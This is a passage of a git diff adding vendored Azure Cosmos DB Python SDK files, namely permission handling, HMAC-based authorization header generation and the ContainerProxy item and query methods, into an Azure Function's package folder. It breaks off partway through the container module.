+ :rtype: ~azure.cosmos.Permission + """ + request_options = build_options(kwargs) + response_hook = kwargs.pop('response_hook', None) + + permission_resp = await self.client_connection.ReplacePermission( + permission_link=self._get_permission_link(permission), permission=body, options=request_options, **kwargs + ) # type: Dict[str, str] + + if response_hook: + response_hook(self.client_connection.last_response_headers, permission_resp) + + return Permission( + id=permission_resp["id"], + user_link=self.user_link, + permission_mode=permission_resp["permissionMode"], + resource_link=permission_resp["resource"], + properties=permission_resp, + ) + + @distributed_trace_async + async def delete_permission(self, permission: Union[str, Dict[str, Any], Permission], **kwargs: Any) -> None: + """Delete the specified permission from the user. + + If the permission does not already exist, an exception is raised. + + :param permission: The ID (name), dict representing the properties or :class:`Permission` + instance of the permission to be deleted. + :type permission: Union[str, Dict[str, Any], ~azure.cosmos.Permission] + :keyword response_hook: A callable invoked with the response metadata. + :paramtype response_hook: Callable[[Dict[str, str], None], None] + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: The permission wasn't deleted successfully. + :raises ~azure.cosmos.exceptions.CosmosResourceNotFoundError: The permission does not exist for the user. + :rtype: None + """ + request_options = build_options(kwargs) + response_hook = kwargs.pop('response_hook', None) + + result = await self.client_connection.DeletePermission( + permission_link=self._get_permission_link(permission), options=request_options, **kwargs + ) + + if response_hook: + response_hook(self.client_connection.last_response_headers, result) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/auth.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/auth.py new file mode 100644 index 0000000..14d78c8 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/auth.py @@ -0,0 +1,156 @@ +# The MIT License (MIT) +# Copyright (c) 2014 Microsoft Corporation + +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: + +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. + +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. + +"""Authorization helper functions in the Azure Cosmos database service. 
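+
+The master-key token produced below is an HMAC-SHA256 signature over a
+canonical, lower-cased request string. A condensed sketch of the same
+computation (the key and header values are made-up placeholders):
+
+    import base64
+    import hmac
+    from hashlib import sha256
+
+    key = base64.b64decode("bXktZmFrZS1tYXN0ZXIta2V5")  # fake master key
+    text = "get\ndbs\ndbs/mydb\nthu, 27 apr 2023 00:51:12 gmt\n\n"
+    digest = hmac.new(key, text.encode("utf-8"), sha256).digest()
+    signature = base64.encodebytes(digest).decode("utf-8")
+    token = "type=master&ver=1.0&sig=" + signature[:-1]  # drop trailing newline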
+""" + +import base64 +from hashlib import sha256 +import hmac +import warnings +import urllib.parse +from . import http_constants + + +def GetAuthorizationHeader( + cosmos_client_connection, verb, path, resource_id_or_fullname, is_name_based, resource_type, headers +): + warnings.warn("This method has been deprecated and will be removed from the SDK in a future release.", + DeprecationWarning) + + return _get_authorization_header( + cosmos_client_connection, verb, path, resource_id_or_fullname, is_name_based, resource_type, headers) + + +def _get_authorization_header( + cosmos_client_connection, verb, path, resource_id_or_fullname, is_name_based, resource_type, headers +): + """Gets the authorization header. + + :param cosmos_client_connection.CosmosClient cosmos_client: + :param str verb: + :param str path: + :param str resource_id_or_fullname: + :param str resource_type: + :param dict headers: + :return: The authorization headers. + :rtype: str + """ + # In the AuthorizationToken generation logic, lower casing of ResourceID is required + # as rest of the fields are lower cased. Lower casing should not be done for named + # based "ID", which should be used as is + if resource_id_or_fullname is not None and not is_name_based: + resource_id_or_fullname = resource_id_or_fullname.lower() + + if cosmos_client_connection.master_key: + return __get_authorization_token_using_master_key( + verb, resource_id_or_fullname, resource_type, headers, cosmos_client_connection.master_key + ) + if cosmos_client_connection.resource_tokens: + return __get_authorization_token_using_resource_token( + cosmos_client_connection.resource_tokens, path, resource_id_or_fullname + ) + + return None + + +def __get_authorization_token_using_master_key(verb, resource_id_or_fullname, resource_type, headers, master_key): + """Gets the authorization token using `master_key. + + :param str verb: + :param str resource_id_or_fullname: + :param str resource_type: + :param dict headers: + :param str master_key: + :return: The authorization token. + :rtype: dict + + """ + + # decodes the master key which is encoded in base64 + key = base64.b64decode(master_key) + + # Skipping lower casing of resource_id_or_fullname since it may now contain "ID" + # of the resource as part of the fullname + text = "{verb}\n{resource_type}\n{resource_id_or_fullname}\n{x_date}\n{http_date}\n".format( + verb=(verb.lower() or ""), + resource_type=(resource_type.lower() or ""), + resource_id_or_fullname=(resource_id_or_fullname or ""), + x_date=headers.get(http_constants.HttpHeaders.XDate, "").lower(), + http_date=headers.get(http_constants.HttpHeaders.HttpDate, "").lower(), + ) + + body = text.encode("utf-8") + digest = hmac.new(key, body, sha256).digest() + signature = base64.encodebytes(digest).decode("utf-8") + + master_token = "master" + token_version = "1.0" + return "type={type}&ver={ver}&sig={sig}".format(type=master_token, ver=token_version, sig=signature[:-1]) + + +def __get_authorization_token_using_resource_token(resource_tokens, path, resource_id_or_fullname): + """Get the authorization token using `resource_tokens`. + + :param dict resource_tokens: + :param str path: + :param str resource_id_or_fullname: + :return: The authorization token. 
+    :rtype: str
+
+    """
+    if resource_tokens:
+        # For database account access (through the GetDatabaseAccount API), path and
+        # resource_id_or_fullname are '', so in this case we return the first token to be
+        # used for creating the auth header, as the service will accept any token in this case
+        path = urllib.parse.unquote(path)
+        if not path and not resource_id_or_fullname:
+            for value in resource_tokens.values():
+                return value
+
+        if resource_tokens.get(resource_id_or_fullname):
+            return resource_tokens[resource_id_or_fullname]
+
+        path_parts = []
+        if path:
+            path_parts = [item for item in path.split("/") if item]
+        resource_types = [
+            "dbs",
+            "colls",
+            "docs",
+            "sprocs",
+            "udfs",
+            "triggers",
+            "users",
+            "permissions",
+            "attachments",
+            "conflicts",
+            "offers",
+        ]
+
+        # Get the last resource id or resource name from the path and get its token from resource_tokens
+        for i in range(len(path_parts), 1, -1):
+            segment = path_parts[i - 1]
+            sub_path = "/".join(path_parts[:i])
+            if segment not in resource_types and sub_path in resource_tokens:
+                return resource_tokens[sub_path]
+
+    return None
diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/container.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/container.py
new file mode 100644
index 0000000..d062d1a
--- /dev/null
+++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/container.py
@@ -0,0 +1,822 @@
+# The MIT License (MIT)
+# Copyright (c) 2014 Microsoft Corporation
+
+# Permission is hereby granted, free of charge, to any person obtaining a copy
+# of this software and associated documentation files (the "Software"), to deal
+# in the Software without restriction, including without limitation the rights
+# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+# copies of the Software, and to permit persons to whom the Software is
+# furnished to do so, subject to the following conditions:
+
+# The above copyright notice and this permission notice shall be included in all
+# copies or substantial portions of the Software.
+
+# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+# SOFTWARE.
+
+"""Create, read, update and delete items in the Azure Cosmos DB SQL API service.
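+
+A minimal usage sketch of the :class:`ContainerProxy` methods defined in this
+module (the endpoint, key, names, and partition key below are placeholders):
+
+.. code-block:: python
+
+    from azure.cosmos import CosmosClient
+
+    client = CosmosClient("https://<account>.documents.azure.com:443/", credential="<account-key>")
+    container = client.get_database_client("mydb").get_container_client("products")
+    container.upsert_item({"id": "1", "productName": "Widget"})
+    item = container.read_item(item="1", partition_key="Widget")
+    for doc in container.query_items(
+        query="SELECT * FROM p WHERE p.productName = @name",
+        parameters=[{"name": "@name", "value": "Widget"}],
+        enable_cross_partition_query=True,
+    ):
+        print(doc["id"])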
+""" + + +from typing import Any, Dict, List, Optional, Union, Iterable, cast, overload # pylint: disable=unused-import + +import warnings +from azure.core.tracing.decorator import distributed_trace # type: ignore + +from ._cosmos_client_connection import CosmosClientConnection +from ._base import build_options, validate_cache_staleness_value +from .exceptions import CosmosResourceNotFoundError +from .http_constants import StatusCodes +from .offer import ThroughputProperties +from .scripts import ScriptsProxy +from .partition_key import NonePartitionKeyValue + +__all__ = ("ContainerProxy",) + +# pylint: disable=protected-access +# pylint: disable=missing-client-constructor-parameter-credential,missing-client-constructor-parameter-kwargs + + +class ContainerProxy(object): + """An interface to interact with a specific DB Container. + + This class should not be instantiated directly. Instead, use the + :func:`~azure.cosmos.database.DatabaseProxy.get_container_client` method to get an existing + container, or the :func:`~azure.cosmos.database.DatabaseProxy.create_container` method to create a + new container. + + A container in an Azure Cosmos DB SQL API database is a collection of + documents, each of which is represented as an Item. + + :ivar str id: ID (name) of the container + :ivar str session_token: The session token for the container. + """ + + def __init__(self, client_connection, database_link, id, properties=None): # pylint: disable=redefined-builtin + # type: (CosmosClientConnection, str, str, Dict[str, Any]) -> None + self.client_connection = client_connection + self.id = id + self._properties = properties + self.container_link = u"{}/colls/{}".format(database_link, self.id) + self._is_system_key = None + self._scripts = None # type: Optional[ScriptsProxy] + + def __repr__(self): + # type () -> str + return "".format(self.container_link)[:1024] + + def _get_properties(self): + # type: () -> Dict[str, Any] + if self._properties is None: + self._properties = self.read() + return self._properties + + @property + def is_system_key(self): + # type: () -> bool + if self._is_system_key is None: + properties = self._get_properties() + self._is_system_key = ( + properties["partitionKey"]["systemKey"] if "systemKey" in properties["partitionKey"] else False + ) + return cast('bool', self._is_system_key) + + @property + def scripts(self): + # type: () -> ScriptsProxy + if self._scripts is None: + self._scripts = ScriptsProxy(self.client_connection, self.container_link, self.is_system_key) + return cast('ScriptsProxy', self._scripts) + + def _get_document_link(self, item_or_link): + # type: (Union[Dict[str, Any], str]) -> str + if isinstance(item_or_link, str): + return u"{}/docs/{}".format(self.container_link, item_or_link) + return item_or_link["_self"] + + def _get_conflict_link(self, conflict_or_link): + # type: (Union[Dict[str, Any], str]) -> str + if isinstance(conflict_or_link, str): + return u"{}/conflicts/{}".format(self.container_link, conflict_or_link) + return conflict_or_link["_self"] + + def _set_partition_key(self, partition_key): + if partition_key == NonePartitionKeyValue: + return CosmosClientConnection._return_undefined_or_empty_partition_key(self.is_system_key) + return partition_key + + @overload + def read( + self, + *, + populate_partition_key_range_statistics: Optional[bool] = None, + populate_quota_info: Optional[bool] = None, + **kwargs + ): + ... + + + @distributed_trace + def read( + self, + *args, + **kwargs # type: Any + ): + # type: (...) 
-> Dict[str, Any] + """Read the container properties. + + :keyword bool populate_partition_key_range_statistics: Enable returning partition key + range statistics in response headers. + :keyword bool populate_quota_info: Enable returning collection storage quota information in response headers. + :keyword str session_token: Token for use with Session consistency. + :keyword dict[str,str] initial_headers: Initial headers to be sent as part of the request. + :keyword Callable response_hook: A callable invoked with the response metadata. + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: Raised if the container couldn't be retrieved. + This includes if the container does not exist. + :returns: Dict representing the retrieved container. + :rtype: dict[str, Any] + """ + request_options = build_options(kwargs) + response_hook = kwargs.pop('response_hook', None) + populate_query_metrics = args[0] if args else kwargs.pop('populate_query_metrics', None) + if populate_query_metrics: + warnings.warn( + "the populate_query_metrics flag does not apply to this method and will be removed in the future", + UserWarning, + ) + populate_partition_key_range_statistics = args[1] if args and len(args) > 0 else kwargs.pop( + "populate_partition_key_range_statistics", None) + populate_quota_info = args[2] if args and len(args) > 1 else kwargs.pop("populate_quota_info", None) + if populate_partition_key_range_statistics is not None: + request_options["populatePartitionKeyRangeStatistics"] = populate_partition_key_range_statistics + if populate_quota_info is not None: + request_options["populateQuotaInfo"] = populate_quota_info + + collection_link = self.container_link + self._properties = self.client_connection.ReadContainer( + collection_link, options=request_options, **kwargs + ) + + if response_hook: + response_hook(self.client_connection.last_response_headers, self._properties) + + return cast('Dict[str, Any]', self._properties) + + @distributed_trace + def read_item( + self, + item, # type: Union[str, Dict[str, Any]] + partition_key, # type: Any + populate_query_metrics=None, # type: Optional[bool] + post_trigger_include=None, # type: Optional[str] + **kwargs # type: Any + ): + # type: (...) -> Dict[str, Any] + """Get the item identified by `item`. + + :param item: The ID (name) or dict representing item to retrieve. + :param partition_key: Partition key for the item to retrieve. + :param post_trigger_include: trigger id to be used as post operation trigger. + :keyword str session_token: Token for use with Session consistency. + :keyword dict[str,str] initial_headers: Initial headers to be sent as part of the request. + :keyword Callable response_hook: A callable invoked with the response metadata. + **Provisional** keyword argument max_integrated_cache_staleness_in_ms + :keyword int max_integrated_cache_staleness_in_ms: + The max cache staleness for the integrated cache in milliseconds. + For accounts configured to use the integrated cache, using Session or Eventual consistency, + responses are guaranteed to be no staler than this value. + :returns: Dict representing the item to be retrieved. + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: The given item couldn't be retrieved. + :rtype: dict[str, Any] + + .. admonition:: Example: + + .. 
literalinclude:: ../samples/examples.py + :start-after: [START update_item] + :end-before: [END update_item] + :language: python + :dedent: 0 + :caption: Get an item from the database and update one of its properties: + :name: update_item + """ + doc_link = self._get_document_link(item) + request_options = build_options(kwargs) + response_hook = kwargs.pop('response_hook', None) + + if partition_key is not None: + request_options["partitionKey"] = self._set_partition_key(partition_key) + if populate_query_metrics is not None: + warnings.warn( + "the populate_query_metrics flag does not apply to this method and will be removed in the future", + UserWarning, + ) + request_options["populateQueryMetrics"] = populate_query_metrics + if post_trigger_include is not None: + request_options["postTriggerInclude"] = post_trigger_include + max_integrated_cache_staleness_in_ms = kwargs.pop('max_integrated_cache_staleness_in_ms', None) + if max_integrated_cache_staleness_in_ms is not None: + validate_cache_staleness_value(max_integrated_cache_staleness_in_ms) + request_options["maxIntegratedCacheStaleness"] = max_integrated_cache_staleness_in_ms + + result = self.client_connection.ReadItem(document_link=doc_link, options=request_options, **kwargs) + if response_hook: + response_hook(self.client_connection.last_response_headers, result) + return result + + @distributed_trace + def read_all_items( + self, + max_item_count=None, # type: Optional[int] + populate_query_metrics=None, # type: Optional[bool] + **kwargs # type: Any + ): + # type: (...) -> Iterable[Dict[str, Any]] + """List all the items in the container. + + :param max_item_count: Max number of items to be returned in the enumeration operation. + :keyword str session_token: Token for use with Session consistency. + :keyword dict[str,str] initial_headers: Initial headers to be sent as part of the request. + :keyword Callable response_hook: A callable invoked with the response metadata. + **Provisional** keyword argument max_integrated_cache_staleness_in_ms + :keyword int max_integrated_cache_staleness_in_ms: + The max cache staleness for the integrated cache in milliseconds. + For accounts configured to use the integrated cache, using Session or Eventual consistency, + responses are guaranteed to be no staler than this value. + :returns: An Iterable of items (dicts). 
+        :rtype: Iterable[dict[str, Any]]
+        """
+        feed_options = build_options(kwargs)
+        response_hook = kwargs.pop('response_hook', None)
+        if max_item_count is not None:
+            feed_options["maxItemCount"] = max_item_count
+        if populate_query_metrics is not None:
+            warnings.warn(
+                "the populate_query_metrics flag does not apply to this method and will be removed in the future",
+                UserWarning,
+            )
+            feed_options["populateQueryMetrics"] = populate_query_metrics
+        max_integrated_cache_staleness_in_ms = kwargs.pop('max_integrated_cache_staleness_in_ms', None)
+        if max_integrated_cache_staleness_in_ms:
+            validate_cache_staleness_value(max_integrated_cache_staleness_in_ms)
+            feed_options["maxIntegratedCacheStaleness"] = max_integrated_cache_staleness_in_ms
+
+        if hasattr(response_hook, "clear"):
+            response_hook.clear()
+
+        items = self.client_connection.ReadItems(
+            collection_link=self.container_link, feed_options=feed_options, response_hook=response_hook, **kwargs
+        )
+        if response_hook:
+            response_hook(self.client_connection.last_response_headers, items)
+        return items
+
+    @distributed_trace
+    def query_items_change_feed(
+        self,
+        partition_key_range_id=None,  # type: Optional[str]
+        is_start_from_beginning=False,  # type: bool
+        continuation=None,  # type: Optional[str]
+        max_item_count=None,  # type: Optional[int]
+        **kwargs  # type: Any
+    ):
+        # type: (...) -> Iterable[Dict[str, Any]]
+        """Get a sorted list of items that were changed, in the order in which they were modified.
+
+        :param partition_key_range_id: ChangeFeed requests can be executed against specific partition key ranges.
+            This is used to process the change feed in parallel across multiple consumers.
+        :param partition_key: Partition key at which ChangeFeed requests are targeted.
+        :param is_start_from_beginning: Get whether change feed should start from
+            beginning (true) or from current (false). By default, it starts from current (false).
+        :param continuation: e_tag value to be used as continuation for reading change feed.
+        :param max_item_count: Max number of items to be returned in the enumeration operation.
+        :keyword Callable response_hook: A callable invoked with the response metadata.
+        :returns: An Iterable of items (dicts).
+ :rtype: Iterable[dict[str, Any]] + """ + feed_options = build_options(kwargs) + response_hook = kwargs.pop('response_hook', None) + if partition_key_range_id is not None: + feed_options["partitionKeyRangeId"] = partition_key_range_id + partition_key = kwargs.pop("partitionKey", None) + if partition_key is not None: + feed_options["partitionKey"] = partition_key + if is_start_from_beginning is not None: + feed_options["isStartFromBeginning"] = is_start_from_beginning + if max_item_count is not None: + feed_options["maxItemCount"] = max_item_count + if continuation is not None: + feed_options["continuation"] = continuation + + if hasattr(response_hook, "clear"): + response_hook.clear() + + result = self.client_connection.QueryItemsChangeFeed( + self.container_link, options=feed_options, response_hook=response_hook, **kwargs + ) + if response_hook: + response_hook(self.client_connection.last_response_headers, result) + return result + + @distributed_trace + def query_items( + self, + query, # type: str + parameters=None, # type: Optional[List[Dict[str, object]]] + partition_key=None, # type: Optional[Any] + enable_cross_partition_query=None, # type: Optional[bool] + max_item_count=None, # type: Optional[int] + enable_scan_in_query=None, # type: Optional[bool] + populate_query_metrics=None, # type: Optional[bool] + **kwargs # type: Any + ): + # type: (...) -> Iterable[Dict[str, Any]] + """Return all results matching the given `query`. + + You can use any value for the container name in the FROM clause, but + often the container name is used. In the examples below, the container + name is "products," and is aliased as "p" for easier referencing in + the WHERE clause. + + :param query: The Azure Cosmos DB SQL query to execute. + :param parameters: Optional array of parameters to the query. + Each parameter is a dict() with 'name' and 'value' keys. + Ignored if no query is provided. + :param partition_key: Specifies the partition key value for the item. + :param enable_cross_partition_query: Allows sending of more than one request to + execute the query in the Azure Cosmos DB service. + More than one request is necessary if the query is not scoped to single partition key value. + :param max_item_count: Max number of items to be returned in the enumeration operation. + :param enable_scan_in_query: Allow scan on the queries which couldn't be served as + indexing was opted out on the requested paths. + :param populate_query_metrics: Enable returning query metrics in response headers. + :keyword str session_token: Token for use with Session consistency. + :keyword dict[str,str] initial_headers: Initial headers to be sent as part of the request. + :keyword Callable response_hook: A callable invoked with the response metadata. + **Provisional** keyword argument max_integrated_cache_staleness_in_ms + :keyword int max_integrated_cache_staleness_in_ms: + The max cache staleness for the integrated cache in milliseconds. + For accounts configured to use the integrated cache, using Session or Eventual consistency, + responses are guaranteed to be no staler than this value. + :returns: An Iterable of items (dicts). + :rtype: ItemPaged[Dict[str, Any]] + + .. admonition:: Example: + + .. literalinclude:: ../samples/examples.py + :start-after: [START query_items] + :end-before: [END query_items] + :language: python + :dedent: 0 + :caption: Get all products that have not been discontinued: + :name: query_items + + .. 
literalinclude:: ../samples/examples.py + :start-after: [START query_items_param] + :end-before: [END query_items_param] + :language: python + :dedent: 0 + :caption: Parameterized query to get all products that have been discontinued: + :name: query_items_param + """ + feed_options = build_options(kwargs) + response_hook = kwargs.pop('response_hook', None) + if enable_cross_partition_query is not None: + feed_options["enableCrossPartitionQuery"] = enable_cross_partition_query + if max_item_count is not None: + feed_options["maxItemCount"] = max_item_count + if populate_query_metrics is not None: + feed_options["populateQueryMetrics"] = populate_query_metrics + if partition_key is not None: + feed_options["partitionKey"] = self._set_partition_key(partition_key) + if enable_scan_in_query is not None: + feed_options["enableScanInQuery"] = enable_scan_in_query + max_integrated_cache_staleness_in_ms = kwargs.pop('max_integrated_cache_staleness_in_ms', None) + if max_integrated_cache_staleness_in_ms: + validate_cache_staleness_value(max_integrated_cache_staleness_in_ms) + feed_options["maxIntegratedCacheStaleness"] = max_integrated_cache_staleness_in_ms + + if hasattr(response_hook, "clear"): + response_hook.clear() + + items = self.client_connection.QueryItems( + database_or_container_link=self.container_link, + query=query if parameters is None else dict(query=query, parameters=parameters), + options=feed_options, + partition_key=partition_key, + response_hook=response_hook, + **kwargs + ) + if response_hook: + response_hook(self.client_connection.last_response_headers, items) + return items + + @distributed_trace + def replace_item( + self, + item, # type: Union[str, Dict[str, Any]] + body, # type: Dict[str, Any] + populate_query_metrics=None, # type: Optional[bool] + pre_trigger_include=None, # type: Optional[str] + post_trigger_include=None, # type: Optional[str] + **kwargs # type: Any + ): + # type: (...) -> Dict[str, Any] + """Replaces the specified item if it exists in the container. + + If the item does not already exist in the container, an exception is raised. + + :param item: The ID (name) or dict representing item to be replaced. + :param body: A dict-like object representing the item to replace. + :param pre_trigger_include: trigger id to be used as pre operation trigger. + :param post_trigger_include: trigger id to be used as post operation trigger. + :keyword str session_token: Token for use with Session consistency. + :keyword dict[str,str] initial_headers: Initial headers to be sent as part of the request. + :keyword str etag: An ETag value, or the wildcard character (*). Used to check if the resource + has changed, and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: The match condition to use upon the etag. + :keyword Callable response_hook: A callable invoked with the response metadata. + :returns: A dict representing the item after replace went through. + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: The replace failed or the item with + given id does not exist. 
+ :rtype: dict[str, Any] + """ + item_link = self._get_document_link(item) + request_options = build_options(kwargs) + response_hook = kwargs.pop('response_hook', None) + request_options["disableAutomaticIdGeneration"] = True + if populate_query_metrics is not None: + warnings.warn( + "the populate_query_metrics flag does not apply to this method and will be removed in the future", + UserWarning, + ) + request_options["populateQueryMetrics"] = populate_query_metrics + if pre_trigger_include is not None: + request_options["preTriggerInclude"] = pre_trigger_include + if post_trigger_include is not None: + request_options["postTriggerInclude"] = post_trigger_include + + result = self.client_connection.ReplaceItem( + document_link=item_link, new_document=body, options=request_options, **kwargs + ) + if response_hook: + response_hook(self.client_connection.last_response_headers, result) + return result + + @distributed_trace + def upsert_item( + self, + body, # type: Dict[str, Any] + populate_query_metrics=None, # type: Optional[bool] + pre_trigger_include=None, # type: Optional[str] + post_trigger_include=None, # type: Optional[str] + **kwargs # type: Any + ): + # type: (...) -> Dict[str, Any] + """Insert or update the specified item. + + If the item already exists in the container, it is replaced. If the item + does not already exist, it is inserted. + + :param body: A dict-like object representing the item to update or insert. + :param pre_trigger_include: trigger id to be used as pre operation trigger. + :param post_trigger_include: trigger id to be used as post operation trigger. + :keyword str session_token: Token for use with Session consistency. + :keyword dict[str,str] initial_headers: Initial headers to be sent as part of the request. + :keyword str etag: An ETag value, or the wildcard character (*). Used to check if the resource + has changed, and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: The match condition to use upon the etag. + :keyword Callable response_hook: A callable invoked with the response metadata. + :returns: A dict representing the upserted item. + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: The given item could not be upserted. + :rtype: dict[str, Any] + """ + request_options = build_options(kwargs) + response_hook = kwargs.pop('response_hook', None) + request_options["disableAutomaticIdGeneration"] = True + if populate_query_metrics is not None: + warnings.warn( + "the populate_query_metrics flag does not apply to this method and will be removed in the future", + UserWarning, + ) + request_options["populateQueryMetrics"] = populate_query_metrics + if pre_trigger_include is not None: + request_options["preTriggerInclude"] = pre_trigger_include + if post_trigger_include is not None: + request_options["postTriggerInclude"] = post_trigger_include + + result = self.client_connection.UpsertItem( + database_or_container_link=self.container_link, + document=body, + options=request_options, + **kwargs + ) + if response_hook: + response_hook(self.client_connection.last_response_headers, result) + return result + + @distributed_trace + def create_item( + self, + body, # type: Dict[str, Any] + populate_query_metrics=None, # type: Optional[bool] + pre_trigger_include=None, # type: Optional[str] + post_trigger_include=None, # type: Optional[str] + indexing_directive=None, # type: Optional[Any] + **kwargs # type: Any + ): + # type: (...) 
-> Dict[str, Any] + """Create an item in the container. + + To update or replace an existing item, use the + :func:`ContainerProxy.upsert_item` method. + + :param body: A dict-like object representing the item to create. + :param pre_trigger_include: trigger id to be used as pre operation trigger. + :param post_trigger_include: trigger id to be used as post operation trigger. + :param indexing_directive: Indicate whether the document should be omitted from indexing. + :keyword bool enable_automatic_id_generation: Enable automatic id generation if no id present. + :keyword str session_token: Token for use with Session consistency. + :keyword dict[str,str] initial_headers: Initial headers to be sent as part of the request. + :keyword str etag: An ETag value, or the wildcard character (*). Used to check if the resource + has changed, and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: The match condition to use upon the etag. + :keyword Callable response_hook: A callable invoked with the response metadata. + :returns: A dict representing the new item. + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: Item with the given ID already exists. + :rtype: dict[str, Any] + """ + request_options = build_options(kwargs) + response_hook = kwargs.pop('response_hook', None) + + request_options["disableAutomaticIdGeneration"] = not kwargs.pop('enable_automatic_id_generation', False) + if populate_query_metrics: + warnings.warn( + "the populate_query_metrics flag does not apply to this method and will be removed in the future", + UserWarning, + ) + request_options["populateQueryMetrics"] = populate_query_metrics + if pre_trigger_include is not None: + request_options["preTriggerInclude"] = pre_trigger_include + if post_trigger_include is not None: + request_options["postTriggerInclude"] = post_trigger_include + if indexing_directive is not None: + request_options["indexingDirective"] = indexing_directive + + result = self.client_connection.CreateItem( + database_or_container_link=self.container_link, document=body, options=request_options, **kwargs + ) + if response_hook: + response_hook(self.client_connection.last_response_headers, result) + return result + + @distributed_trace + def delete_item( + self, + item, # type: Union[Dict[str, Any], str] + partition_key, # type: Any + populate_query_metrics=None, # type: Optional[bool] + pre_trigger_include=None, # type: Optional[str] + post_trigger_include=None, # type: Optional[str] + **kwargs # type: Any + ): + # type: (...) -> None + """Delete the specified item from the container. + + If the item does not already exist in the container, an exception is raised. + + :param item: The ID (name) or dict representing item to be deleted. + :param partition_key: Specifies the partition key value for the item. + :param pre_trigger_include: trigger id to be used as pre operation trigger. + :param post_trigger_include: trigger id to be used as post operation trigger. + :keyword str session_token: Token for use with Session consistency. + :keyword dict[str,str] initial_headers: Initial headers to be sent as part of the request. + :keyword str etag: An ETag value, or the wildcard character (*). Used to check if the resource + has changed, and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: The match condition to use upon the etag. 
+        :keyword Callable response_hook: A callable invoked with the response metadata.
+        :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: The item wasn't deleted successfully.
+        :raises ~azure.cosmos.exceptions.CosmosResourceNotFoundError: The item does not exist in the container.
+        :rtype: None
+        """
+        request_options = build_options(kwargs)
+        response_hook = kwargs.pop('response_hook', None)
+        if partition_key is not None:
+            request_options["partitionKey"] = self._set_partition_key(partition_key)
+        if populate_query_metrics is not None:
+            warnings.warn(
+                "the populate_query_metrics flag does not apply to this method and will be removed in the future",
+                UserWarning,
+            )
+            request_options["populateQueryMetrics"] = populate_query_metrics
+        if pre_trigger_include is not None:
+            request_options["preTriggerInclude"] = pre_trigger_include
+        if post_trigger_include is not None:
+            request_options["postTriggerInclude"] = post_trigger_include
+
+        document_link = self._get_document_link(item)
+        result = self.client_connection.DeleteItem(document_link=document_link, options=request_options, **kwargs)
+        if response_hook:
+            response_hook(self.client_connection.last_response_headers, result)
+
+    @distributed_trace
+    def read_offer(self, **kwargs):
+        # type: (Any) -> ThroughputProperties
+        """Get the ThroughputProperties object for this container.
+
+        If no ThroughputProperties already exist for the container, an exception is raised.
+
+        :keyword Callable response_hook: A callable invoked with the response metadata.
+        :returns: Throughput for the container.
+        :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: No throughput properties exist for the container or
+            the throughput properties could not be retrieved.
+        :rtype: ~azure.cosmos.ThroughputProperties
+        """
+        warnings.warn(
+            "read_offer is a deprecated method name, use get_throughput instead",
+            DeprecationWarning
+        )
+        return self.get_throughput(**kwargs)
+
+    @distributed_trace
+    def get_throughput(self, **kwargs):
+        # type: (Any) -> ThroughputProperties
+        """Get the ThroughputProperties object for this container.
+
+        If no ThroughputProperties already exist for the container, an exception is raised.
+
+        :keyword Callable response_hook: A callable invoked with the response metadata.
+        :returns: Throughput for the container.
+        :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: No throughput properties exist for the container or
+            the throughput properties could not be retrieved.
+        :rtype: ~azure.cosmos.ThroughputProperties
+        """
+        response_hook = kwargs.pop('response_hook', None)
+        properties = self._get_properties()
+        link = properties["_self"]
+        query_spec = {
+            "query": "SELECT * FROM root r WHERE r.resource=@link",
+            "parameters": [{"name": "@link", "value": link}],
+        }
+        throughput_properties = list(self.client_connection.QueryOffers(query_spec, **kwargs))
+        if not throughput_properties:
+            raise CosmosResourceNotFoundError(
+                status_code=StatusCodes.NOT_FOUND,
+                message="Could not find ThroughputProperties for container " + self.container_link)
+
+        if response_hook:
+            response_hook(self.client_connection.last_response_headers, throughput_properties)
+
